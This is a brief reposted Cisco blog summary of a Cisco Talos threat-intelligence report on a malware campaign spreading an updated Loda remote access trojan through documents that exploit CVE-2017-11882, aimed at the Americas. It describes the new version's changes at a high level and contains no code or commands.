Cisco and Telenor: Working Together to Protect Infrastructure
February 14, 2020
NetApp Reports Third Quarter of Fiscal Year 2020 Results
February 14, 2020

Loda RAT Grows Up

By Chris Neal.

Over the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
These websites also host malicious documents that begin a multi-stage infection chain which ultimately serves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run the MSI file, which contains Loda version 1.1.1.
This campaign appears to be targeting countries in South America and Central America, as well as the U.S.

What’s New?

Talos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT script changed to a different form of string encoding. Multiple persistence mechanisms have been employed to ensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to enumerate antivirus solutions running on the infected host.


The post Loda RAT Grows Up appeared first on Cisco Blogs.